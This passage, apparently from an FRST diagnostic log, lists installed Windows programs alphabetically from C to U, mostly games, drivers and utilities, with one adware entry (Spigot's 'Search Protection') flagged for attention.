Carmageddon Mod version 3.0.0.0 (HKLM-x32\...\{8A1CC0C6-88DB-44C6-B259-9EA8EE1BA96C}_is1) (Version: 3.0.0.0 - GiphtWorks)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Comic Sound Pack (HKLM-x32\...\{79A743FA-FF99-42DF-8C35-BA40EAEA6668}) (Version: 2.1.0 - Screaming Bee)
Contagion (HKLM-x32\...\Steam App 238430) (Version:  - Monochrome LLC)
Corel Painter 13 - IPM (Version: 13.0 - Corel Corporation) Hidden
Corel Painter 13 - IPM Content (Version: 13.0 - Corel Corporation) Hidden
Counter-Strike: Global Offensive - SDK (HKLM-x32\...\Steam App 745) (Version:  - )
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Creatures of Darkness (HKLM-x32\...\{5B616A3F-43D9-4F0B-9F49-D39342A98592}) (Version: 3.3.0 - Screaming Bee LLC)
Creeper World 3 (HKLM\...\{9FF369E0-0274-4715-A348-1A222857BFCD}_is1) (Version:  - Knuckle Cracker, LLC)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Deep Space Voices (HKLM-x32\...\{336E1A2D-E3EB-4846-B7D0-BD75BBBBC0A4}) (Version: 3.3.0 - Screaming Bee)
DEFCON (HKLM-x32\...\Steam App 1520) (Version:  - Introversion Software)
Dishonored (HKLM-x32\...\Steam App 205100) (Version: 1.0 - Bethesda Softworks)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Dungeonland (HKLM-x32\...\Steam App 218130) (Version:  - Critical Studio)
Dxtory version 2.0.119 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.119 - Dxtory Software)
eManual (HKLM-x32\...\{0C84E634-EB68-4A54-B21E-A05EC87A4CC5}) (Version: 1.00.00 - ASUSTeK Computer Inc.)
Explorer Suite IV (HKLM\...\Explorer Suite_is1) (Version:  - )
f.lux (HKCU\...\Flux) (Version:  - )
Factorio version 0.9.8 (HKLM\...\Factorio_is1) (Version:  - )
Fallout New Vegas  1.4 (HKLM-x32\...\Fallout New Vegas_is1) (Version: 1.4 - Bethesda Softworks)
Fantasy Sound Pack (HKLM-x32\...\{06ACD0D6-537A-4831-9608-AA74A5795698}) (Version: 1.1.0 - Screaming Bee)
Far Cry 3 Blood Dragon (HKLM-x32\...\Far Cry 3 Blood Dragon_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Far Cry® 3 (HKLM-x32\...\Steam App 220240) (Version:  - Ubisoft Montreal, Massive Entertainment, and Ubisoft Shanghai)
Farm Animal Sounds (HKLM-x32\...\{20052CA0-FF43-4901-8261-E6DBF0A09ED1}) (Version: 1.1.0 - Screaming Bee)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Fistful of Frags (HKLM-x32\...\Steam App 265630) (Version:  - Fistful of Frags Team)
Floating Point (HKLM-x32\...\Steam App 302380) (Version:  - Suspicious Developments)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free Screen Video Recorder version 2.5.30.725 (HKLM-x32\...\Free Screen Video Recorder_is1) (Version: 2.5.30.725 - DVDVideoSoft Ltd.)
Frozen Synapse (HKLM-x32\...\Steam App 98200) (Version:  - )
FTL version 1.01 (HKLM-x32\...\{20E23A40-38E5-4DD6-B738-BC8097AE66B6}_is1) (Version: 1.01 - Subset Games)
Galactic Voices (HKLM-x32\...\{DF3FE308-58F2-45E2-9BB0-6A993794AD5C}) (Version: 1.3.0 - Screaming Bee)
Galería de fotos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
GameMaker: Studio (HKLM-x32\...\Steam App 214850) (Version:  - YoYo Games Ltd.)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Garry)
Ghost Recon Online (NCSA-Live) (HKCU\...\fc418bf9b18f76aa) (Version: 1.30.8665.2 - Ubisoft)
GoldenEye: Source (HKLM-x32\...\GoldenEye Source) (Version: 4.2.3 - Team GoldenEye: Source)
GoldenEye: Source (HKLM-x32\...\GoldenEye: Source) (Version: 4.2 - Team GoldenEye: Source)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (HKLM-x32\...\Steam App 12220) (Version:  - Rockstar North / Toronto)
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0002.135 - Rockstar Games Inc.) Hidden
GTA San Andreas (HKLM-x32\...\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}) (Version: 1.00.00001 - Rockstar Games)
Gunpoint (HKLM-x32\...\Steam App 206190) (Version:  - Suspicious Developments)
Guns of Icarus Online (HKLM-x32\...\Steam App 209080) (Version:  - Muse Games)
HexEdit (HKLM-x32\...\{083EF76E-0760-4D7A-9508-0B88A3AF1889}) (Version: 4.0.0 - Expert Commercial Software Pty Ltd)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Hitman Absolution (HKLM-x32\...\Hitman Absolution_is1) (Version:  - )
Hitman Blood Money (HKLM-x32\...\{A804B134-F03D-4EFD-9BC0-DCD257AA1B22}) (Version: 1.00.0000 - Eidos)
IconHandler 64 bit (Version: 2.0 - Corel Corporation) Hidden
Inform 7 (HKLM-x32\...\Inform 7) (Version:  - )
iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.)
Jack Claw (HKLM-x32\...\Jack Claw_is1) (Version:  - Frozenbyte, Inc.)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.670 - Oracle)
Java Auto Updater (x32 Version: 2.1.67.1 - Oracle, Inc.) Hidden
Just Cause 2 (HKLM-x32\...\Steam App 8190) (Version:  - Avalanche)
Just Cause 2: Multiplayer Mod (HKLM-x32\...\Steam App 259080) (Version:  - JC2-MP Team)
Kits Configuration Installer (x32 Version: 8.100.25984 - Microsoft) Hidden
L.A. Noire (HKLM-x32\...\Steam App 110800) (Version:  - Team Bondi)
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Left 4 Dead 2 Authoring Tools (HKLM-x32\...\Steam App 563) (Version:  - Valve)
Left 4 Dead 2 Beta (HKLM-x32\...\Steam App 223530) (Version:  - )
Logitech SetPoint 6.65 (HKLM\...\sp6) (Version: 6.65.62 - Logitech)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Magicite (HKLM-x32\...\Steam App 268750) (Version:  - SmashGames)
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios AB)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mass Effect - Unification version 1.12 (HKLM-x32\...\{2CD83494-75D3-457B-A9EA-164377B56443}_is1) (Version: 1.12 - Frayed Wires Studios)
Mass Effect (HKLM-x32\...\{1B0FBB9A-995D-47cd-87CD-13E68B676E4F}) (Version: 1.00 - Electronic Arts, Inc.)
Mass Effect 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.02 - Electronic Arts, Inc.)
Mass Effect™ 3 (HKLM-x32\...\{6A9D1594-7791-48f5-9CAA-DE9BCB968320}) (Version: 1.01.0.0 - Electronic Arts)
Men of War: Assault Squad (HKLM-x32\...\Steam App 64000) (Version:  - Digitalmindsoft)
Men of War: Red Tide (HKLM-x32\...\Steam App 3130) (Version:  - 1C Company)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Motocross Madness 2 (HKLM-x32\...\Motocross Madness 2) (Version:  - )
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle-earth: Shadow of Mordor (HKLM-x32\...\Steam App 241930) (Version:  - Monolith Productions, Inc.)
Modern Combat (HKLM-x32\...\Modern Combat 1.015) (Version: 1.015 - BSS Modern Combat Dev Team)
Modern Combat (x32 Version: 1.015 - BSS Modern Combat Dev Team) Hidden
MorphVOX Pro (HKLM-x32\...\{DE289787-7ECA-4BED-9D8C-99FAC407E3D6}) (Version: 4.3.13 - Screaming Bee)
Morrowind (HKLM-x32\...\{C325F588-D6B1-4A7F-B6A2-914C75DDA348}) (Version:  - )
Movie Maker (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1108.0727 - Microsoft) Hidden
Multiwinia (HKLM-x32\...\Steam App 1530) (Version:  - Introversion Software)
Natural Selection 2 (HKLM-x32\...\Steam App 4920) (Version:  - Unknown Worlds Entertainment)
Nero 12 Essentials OEM.a01 (HKLM-x32\...\{2AC099EA-CC1C-4E4E-BDFC-0353DCF13DD0}) (Version: 12.5.00400 - Nero AG)
Nero ControlCenter (x32 Version: 11.0.15200 - Nero AG) Hidden
Nero ControlCenter Help (CHM) (x32 Version: 12.0.0003 - Nero AG) Hidden
Nero Core Components (x32 Version: 11.0.17800 - Nero AG) Hidden
Nero Express (x32 Version: 12.0.19000 - Nero AG) Hidden
Nero Express Help (CHM) (x32 Version: 12.0.1000 - Nero AG) Hidden
Nero Launcher (x32 Version: 12.2.2000 - Nero AG) Hidden
Nero Update (x32 Version: 11.0.11800.31.0 - Nero AG) Hidden
Next Car Game Technology Sneak Peek 2.0 (HKLM-x32\...\Next Car Game Technology Sneak Peek) (Version:  - Bugbear Entertainment)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.52.1 - Black Tree Gaming)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
No More Room in Hell (HKLM-x32\...\Steam App 224260) (Version:  - No More Room in Hell Team)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6 - Notepad++ Team)
NVIDIA 3D Vision Controller Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 337.88 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 337.88 - NVIDIA Corporation)
NVIDIA Control Panel 337.88 (Version: 337.88 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 337.88 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.157.1165 - NVIDIA Corporation) Hidden
NVIDIA LED Visualizer 1.0 (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA Network Service (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.13.1220 - NVIDIA Corporation) Hidden
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA ShadowPlay 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.6514 - NVIDIA Corporation) Hidden
NVIDIA Update 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Update Core (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Virtual Audio 1.2.23 (Version: 1.2.23 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 9.3.1.4482 - Electronic Arts, Inc.)
PA Mod Manager 3.4.0 (HKLM-x32\...\PA Mod Manager) (Version: 3.4.0 - Raevn)
paint.net (HKLM\...\{F509C1F4-0029-49F9-B145-A4C4E8DF481A}) (Version: 4.0.3 - dotPDN LLC)
Painter 13 - Contentx64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Core (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Corex64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - EN (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Setup Files (Version: 13.0 - Corel Corporation) Hidden
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Plague Inc Evolved (HKLM-x32\...\Plague Inc Evolved_is1) (Version: 0.7.5.1 - Decepticon)
PlanetSide 2 (HKCU\...\SOE-PlanetSide 2) (Version:  - Sony Online Entertainment)
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Sony Online Entertainment)
Play withSIX (HKLM-x32\...\{D7F3EEAD-183C-47DE-BDC5-593539573F97}) (Version: 1.30.0476 - SIX Networks)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
Portal 2 Authoring Tools - Beta (HKLM-x32\...\Steam App 629) (Version:  - Valve)
Portal 2 Publishing Tool (HKLM-x32\...\Steam App 644) (Version:  - )
Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden
Process Hacker 2.33 (r5590) (HKLM\...\Process_Hacker2_is1) (Version: 2.33.0.5590 - wj32)
Project Zomboid (HKLM-x32\...\Steam App 108600) (Version:  - The Indie Stone)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake Live Mozilla Plugin (HKLM-x32\...\{FA66CFD7-0977-4C45-AACD-A8BB994B1A05}) (Version: 1.0.520 - id Software)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.1 beta r2280 - )
Razer Comms (HKLM-x32\...\Razer Comms) (Version: 2.0 - Razer Inc.)
Razer Game Booster (HKLM-x32\...\Razer Game Booster_is1) (Version: 4.0.68.0 - Razer Inc.)
Razer Surround (HKLM-x32\...\Razer Surround) (Version: 1.05.10 - Razer Inc.)
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.15.20888 - Razer Inc.)
RealDownloader (x32 Version: 17.0.12 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.12 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Red Faction: Guerrilla  (HKLM-x32\...\Steam App 20500) (Version:  - Volition)
ROBLOX Player for RaRWolf (HKCU\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.0.6 - Rockstar Games)
Rodina (HKLM-x32\...\{0B7E56F5-D39D-4A41-B3A0-D60886044041}) (Version: 1.1.0 - Elliptic Games)
Roleplaying City Map Generator (HKLM-x32\...\{3B585A53-CC41-4969-A7CB-F0E5D34ACA08}) (Version: 4.5.0.0 - )
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
Running With Rifles 0.98.4 (HKLM-x32\...\Running With Rifles 0.98.4) (Version: 0.98.4 - Èãðû íà Cat-A-Cat.NET)
RUNNING WITH RIFLES Demo version 0.76 (HKLM-x32\...\{5ABD42BC-4DDD-48C7-9951-48B31F27EC39}_is1) (Version: 0.76 - Modulaatio Games)
Running with rifles version 0.95 (HKLM-x32\...\{E2948988-2C6C-4070-BC8B-A1D77FE97D09}_is1) (Version: 0.95 - Modulaatio Games)
Rust (HKLM-x32\...\{E3948799-9E75-4704-8E36-071C43A2750C}) (Version: 19.12.2013 - Facepunch)
Saints Row 2 (HKLM-x32\...\Steam App 9480) (Version:  - Volition)
Sci-Fi 2 Sound Pack (HKLM-x32\...\{E7E76513-335F-4995-86CF-A85B77D8D975}) (Version: 1.3.0 - Screaming Bee)
Sci-Fi Sound Pack (HKLM-x32\...\{D13F2D95-1CE0-4147-846F-89ECB2E9A5CD}) (Version: 1.1.0 - Screaming Bee)
SDK Debuggers (x32 Version: 8.100.26629 - Microsoft Corporation) Hidden
Search Protection (HKCU\...\Search Protection) (Version: 7.5.0.1 - Spigot, Inc.) <==== ATTENTION
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Sid Meier's Civilization 5 (HKLM-x32\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Six Updater (HKLM-x32\...\{2D8CED57-CCDB-4D86-9087-3BBCAE8F8F22}) (Version: 2.09.7038 - Six Projects)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Sleeping Dogs™ (HKLM-x32\...\Steam App 202170) (Version:  - United Front Games)
Source SDK (HKLM-x32\...\Steam App 211) (Version:  - Valve)
Source SDK Base 2006 (HKLM-x32\...\Steam App 215) (Version:  - Valve)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Space Engineers (HKLM-x32\...\Steam App 244850) (Version:  - )
Space Engineers Toolbox (HKLM-x32\...\{60079798-AEE7-48FD-B642-810D3D1B2C26}) (Version: 01.039.010.1 - Mid-Space Productions)
Split/Second (HKLM-x32\...\{28526951-55EF-4901-A0CA-B9AC966D1DD1}) (Version: 1.00.0000 - Disney Interactive Studios)
Spooky Sounds (HKLM-x32\...\{D813EF9B-69CF-4996-893C-B400AE7292FA}) (Version: 2.1.0 - Screaming Bee)
Spore (HKLM-x32\...\Steam App 17390) (Version:  - Maxis)
Square Enix Secure Launcher (HKCU\...\Square Enix Secure Launcher) (Version: 1.0.0.108 - Square Enix)
Stacking (HKLM-x32\...\Steam App 115110) (Version:  - )
Star Wars Battlefront (HKLM-x32\...\{C79CB9C7-10A4-4814-8402-F574672C2192}) (Version: 1.0 - LucasArts)
Star Wars Battlefront II (HKLM-x32\...\{3D374523-CFDE-461A-827E-2A102E2AB365}) (Version: 1.0 - LucasArts)
Star wars Battlefront II version 1.3 (HKLM-x32\...\{2EF34761-F147-4984-8AF1-BB9F8DA76CDD}_is1) (Version: 1.3 - )
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
StarForge Alpha (HKLM-x32\...\Steam App 227680) (Version:  - )
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stykz for Windows 1.0.2 (HKLM-x32\...\{7E44C354-10A8-4214-9C56-F3F00775E415}_is1) (Version: 1.0.2 - Sons of Thunder Software, Inc.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab CYRI (HKLM-x32\...\{F3FCB08B-E752-444D-86A0-0634A4F3B23D}) (Version: 6.0.8.0 - Husdawg, LLC)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 2 RC2 (HKLM-x32\...\Teamspeak 2 RC2_is1) (Version: 2.0.32.60 - Dominating Bytes Design)
TeamSpeak 2 Server RC2 (HKLM-x32\...\TeamSpeak 2 Server_is1) (Version: 2.0.23.19 - TeamSpeak Systems)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.13.1 - TeamSpeak Systems GmbH)
Terraria version 1.2.4.1 (HKLM-x32\...\{1520E069-19A9-4B01-BA5D-87B67D56F55D}_is1) (Version: 1.2.4.1 - )
TES Construction Set (HKLM-x32\...\{DB3C800B-081B-4146-B4E3-EFB5B77AA913}) (Version:  - )
The Ship Single Player (HKLM-x32\...\Steam App 2420) (Version:  - Outerlight Ltd.)
The Showdown Effect (HKLM-x32\...\Steam App 204080) (Version:  - Arrowhead Game Studios)
The Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.67.2 - Electronic Arts)
The Sims™ 3 Create a World Tool - Beta (HKLM-x32\...\{65761BAE-11E8-48FE-B30F-1F01011AB906}) (Version: 1.19.6 - Electronic Arts)
The Sims™ 3 High-End Loft Stuff (HKLM-x32\...\{71828142-5A24-4BD0-97E7-976DA08CE6CF}) (Version: 3.0.38 - Electronic Arts)
The Sims™ 3 Late Night (HKLM-x32\...\{45057FCE-5784-48BE-8176-D9D00AF56C3C}) (Version: 6.5.1 - Electronic Arts)
The Witcher Enhanced Edition (HKLM-x32\...\{F138762F-5A1F-4CF0-A5E1-1588EF6088A4}) (Version: 1.00.0000 - CD Projekt Red)
Tiny and Big: Grandpa's Leftovers (HKLM-x32\...\Steam App 205910) (Version:  - Black Pants Game Studio)
Tom Clancy's Splinter Cell Chaos Theory (HKLM-x32\...\{888DD888-82BE-4D85-BCB2-2E042CD3E844}) (Version: 1.05.157 - Ubisoft)
Tom Clancy's Splinter Cell Conviction (HKLM-x32\...\{6D8DDB4A-C263-40DE-BA16-AFDAD159D59A}) (Version: 1.00.000 - Ubisoft)
Tom Clancy's Splinter Cell® Blacklist™ (HKLM-x32\...\{A6356F2F-D3E1-4D83-9AA2-72871DD0C298}) (Version: 1.00.1000 - Ubisoft)
Tomb Raider III (HKLM-x32\...\Tomb Raider III) (Version:  - )
Trials Evolution Gold Edition (HKLM-x32\...\InstallShield_{07D857B8-C956-401D-BC8F-EDA8459AF037}) (Version: 1.0.0.5 - Ubisoft)
Trials Evolution Gold Edition (x32 Version: 1.0.0.5 - Ubisoft) Hidden
TVPaint Animation 10.0 Professional Edition (32bits) (DEMO) (remove only) (HKLM-x32\...\TVP Animation 10 Pro DEMO) (Version:  - )
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-3d519be7-e7af-4b69-98ba-bbe1e7c83c74) (Version:  - Epic Games, Inc.)
